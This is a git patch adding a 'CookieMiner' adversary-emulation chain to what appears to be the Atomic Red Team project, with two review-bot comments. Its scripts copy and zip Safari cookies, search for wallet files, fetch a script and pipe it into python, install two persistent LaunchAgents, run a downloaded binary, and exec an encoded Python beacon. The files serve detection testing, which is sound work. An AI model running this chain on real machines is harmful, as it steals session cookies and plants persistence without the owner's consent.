From 8e2ec0aae1bb8d57da7d987632dee8e8837e0de7 Mon Sep 17 00:00:00 2001 From: Tony M Lambert Date: Wed, 6 Feb 2019 11:52:31 -0700 Subject: [PATCH] CookieMiner Chain Reaction (#451) * initial commit * modified output style * final url changes * Update rocke-and-roll-stage-01.sh * CookieMiner initial commit * fix binary stuff * Make quieter * Ready for primetime --- ARTifacts/Chain_Reactions/atomic-hello.macos | Bin 0 -> 8432 bytes .../cookie-miner-backdoor-launchagent.plist | 16 ++++++ .../cookie-miner-payload-launchagent.plist | 14 +++++ .../Chain_Reactions/cookie-miner-stage-01.sh | 49 ++++++++++++++++++ .../Chain_Reactions/cookie-miner-stage-02.py | 25 +++++++++ 5 files changed, 104 insertions(+) create mode 100755 ARTifacts/Chain_Reactions/atomic-hello.macos create mode 100644 ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist create mode 100644 ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist create mode 100644 ARTifacts/Chain_Reactions/cookie-miner-stage-01.sh create mode 100644 ARTifacts/Chain_Reactions/cookie-miner-stage-02.py 
diff --git a/ARTifacts/Chain_Reactions/atomic-hello.macos b/ARTifacts/Chain_Reactions/atomic-hello.macos new file mode 100755 index 0000000000000000000000000000000000000000..ff1adeb061375c6a84696e354bbbd1a9f6a41630 GIT binary patch literal 8432 zcmeHMO=}ZD7@qXQmRjo;LHww)Emr)1wu%Qughm=nY0-W}Crqg!o+_UF0V)*~Ja`Zhsy6%q$E$o8LeG zY!f2VEW~n?5Mnp{S&I<&go%<6`{8l8loQcQvDw(v71lOdq!IoWk>@QErA)+T5{)Tt zf1|NZD2%a*R^`l)(y^8tmOKmdO<)4#JE7W%F`c@#h~+vUU(qS0inXdR-)+UWLuL5b z@6fLJ{C1B|rY(EXDj+G$x2*UMC<0>YUbAiEn=3knOzwtC2=hHue1}y#anKsL(I90h zcPo>dmzmr`-o=gUv99>I<}~6khu7jgxvpDqDMzA-XrKk_*RZbs`Uch&d#=VUWzLqx zayFH><)TygBcD&h{lWgeQGfS+szORT`8PfT{h8mc@`;0d+;>4-{|?4SFOS7WM*Tf( zhUN)O`{D&bp5VCp@SP2@&Gg>gj<}ClnQ01l>klC^kJ__64a|MKj(8SvCwu}PH0Jsq ztPhqSo1yPPHFhDQNp!*oOU1&VokmKr5gX&<8cYL~QLsIQ42Z_HA_|zVgDj_Pp9(LDl%$p}Ppt>1zK?#7Y_u@$o~oT8&$_oi`T> z`K%dr^4ZLsIc3e82`icHH9Oq%b`Nu5!N{{S&(>!U>37sQn`NHKJJHkdPU}GR0s*ap zeD^HxLH*PUXa%$aS^=$qRzNGD70?Q31+)TM0j+>m;6G5HyU&>9G`fd*+2>w{%M|X1 zad|yi5EW4{x`*W=E})$SAXr4=KE6q2)6!b9=1Pu*yY3{@d$Y+*PW1B!M6-D9-$(le yR_~5@H-Y@Wu-C=jzY1dh!$7S4dN>lo9xW<`7-reT4e|CdNOuhWc(=_6{eA%tFTbGx literal 0 HcmV?d00001 diff --git a/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist b/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist new file mode 100644 index 00000000..c07c8a3e --- /dev/null +++ b/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist @@ -0,0 +1,16 @@ + + + + +Label +cookie-miner-backdoor-launchagent.plist +ProgramArguments + +python +-c +import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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')); + +RunAtLoad + + + \ No newline at end of file diff --git a/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist b/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist new file mode 100644 index 00000000..d6cfb2cf --- /dev/null +++ b/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist 
@@ -0,0 +1,14 @@ + + + + + ProgramArguments + + /Users/Shared/xmrig2 + + RunAtLoad + + Label + cookie-miner-payload-launchagent.plist + + \ No newline at end of file diff --git a/ARTifacts/Chain_Reactions/cookie-miner-stage-01.sh b/ARTifacts/Chain_Reactions/cookie-miner-stage-01.sh new file mode 100644 index 00000000..bf46c190 --- /dev/null +++ b/ARTifacts/Chain_Reactions/cookie-miner-stage-01.sh 
@@ -0,0 +1,49 @@
+#! /bin/bash
+
+# Tactic: Discovery
+# Technique: T1033 - System Owner/User Discovery
+OUTPUT="$(id -un)"
+
+# Tactic: Collection
+# Technique: T1005 - Data from Local System
+cd ~/Library/Cookies
+grep -q "coinbase" "Cookies.binarycookies"
+
+# Tactic: Collection
+# Technique: T1074 - Data Staged
+mkdir ${OUTPUT}
+cp Cookies.binarycookies ${OUTPUT}/Cookies.binarycookies
+
+# Tactic: Exfiltration
+# Technique: T1002 - Data Compressed
+zip -r interestingsafaricookies.zip ${OUTPUT}
+
+# Tactic: Exfiltration
+# Technique: T1048 - Exfiltration Over Alternative Protocol
+# Simulate network connection for exfiltration
+curl https://atomicredteam.io > /dev/null
+
+curl --silent https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py || wget -q -O- https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py | python - ``
+
+# Tactic: Discovery
+# Technique: T1083 - File and Directory Discovery
+find ~ -name "*wallet*" > interestingfiles.txt
+cp interestingfiles.txt ${OUTPUT}/interestingfiles.txt
+
+# Tactic: Persistence
+# Technique: T1159 - Launch Agent
+mkdir -p ~/Library/LaunchAgents
+cd ~/Library/LaunchAgents
+curl --silent -o com.apple.rig2.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-payload-launchagent.plist
+curl --silent -o com.proxy.initialize.plist https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/cookie-miner-backdoor-launchagent.plist
+launchctl load -w com.apple.rig2.plist
+launchctl load -w com.proxy.initialize.plist
+
+
+cd /Users/Shared
+curl --silent -o xmrig2 https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Chain_Reactions/atomic-hello.macos
+
+# Tactic: Defense Evasion
+# Technique: T1222 - File Permissions Modification
+chmod +x ./xmrig2
+./xmrig2
\ No newline at end of file
diff --git a/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py b/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py
new file mode 100644
index 00000000..fa5ea5f5
--- /dev/null
+++ b/ARTifacts/Chain_Reactions/cookie-miner-stage-02.py
@@ -0,0 +1,25 @@
+# import sys;import re, subprocess;cmd = "ps -ef | grep Little\ Snitch | grep -v grep"
+# ps = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
+# out = ps.stdout.read()
+# ps.stdout.close()
+# if re.search("Little Snitch", out):
+# sys.exit()
+# import urllib2;
+# UA='Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko';server='http://atomicredteam.io';t='/news.php';req=urllib2.Request(server+t);
+# req.add_header('User-Agent',UA);
+# req.add_header('Cookie',"session=BmHiW7UA/sf9C279oE2owK9LZ0c=");
+# proxy = urllib2.ProxyHandler();
+# o = urllib2.build_opener(proxy);
+# urllib2.install_opener(o);
+# a=urllib2.urlopen(req).read();
+
+# Tactic: Defense Evasion
+# Technique: T1140 - Deobfuscate/Decode Files or Information
+#
+# Tactic: Discovery
+# Technique: T1057 - Process Discovery
+#
+# Tactic: Command and Control
+# Technique: T1043 - Commonly Used Port
+#
+import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('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'))
\ No newline at end of file
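Review bot: The stage-02 line `curl --silent … || wget -q -O- … | python - ``` only pipes into python on the wget fallback, because `|` binds tighter than `||`; when curl succeeds the downloaded script is written to stdout and never executed, and the trailing empty backticks are a stray command substitution. Grouping the two fetches, `(curl --silent <stage-02 url> || wget -q -O- <stage-02 url>) | python -`, makes the fallback do what the surrounding Technique comments describe. `cd ~/Library/Cookies` and `cd ~/Library/LaunchAgents` are unchecked, so if either fails the staging, `curl -o` and `launchctl load` steps run in whatever the previous directory was; `cd ~/Library/Cookies || exit 1` (and the same for LaunchAgents) keeps each step where its comment says it happens. There is no cleanup counterpart to this stage: it loads two LaunchAgents with `-w`, starts `/Users/Shared/xmrig2`, and leaves the `${OUTPUT}` directory, `interestingsafaricookies.zip` and `interestingfiles.txt` under `~/Library/Cookies`, so a companion cleanup script or at least a header comment listing those artifacts (unload both agents, delete the two plists, stop and remove xmrig2, delete the staged files) should ship with it.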
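Review bot: The only live statement in this file is the final `exec(base64.b64decode(...))`, and its readable form exists only as the commented-out block at the top, with nothing stating that the two must be kept in sync; a header such as `# The commented block above is the decoded content of the base64 blob on the last line; regenerate both together when either changes.` would make that explicit, and the same blob appears to be duplicated in the backdoor plist added by this commit, which the header should mention so it is not updated in one place only. The commented copy is Python 2 (`urllib2`, `out` passed to `re.search` as a str), and both stage-01 and the backdoor plist invoke it as plain `python`, which recent macOS releases no longer ship, so the interpreter requirement belongs in that header as well. `# sys.exit()` sits flush-left under the `if` in this rendering; that may be a display artifact, but it is worth confirming against the source the blob was generated from.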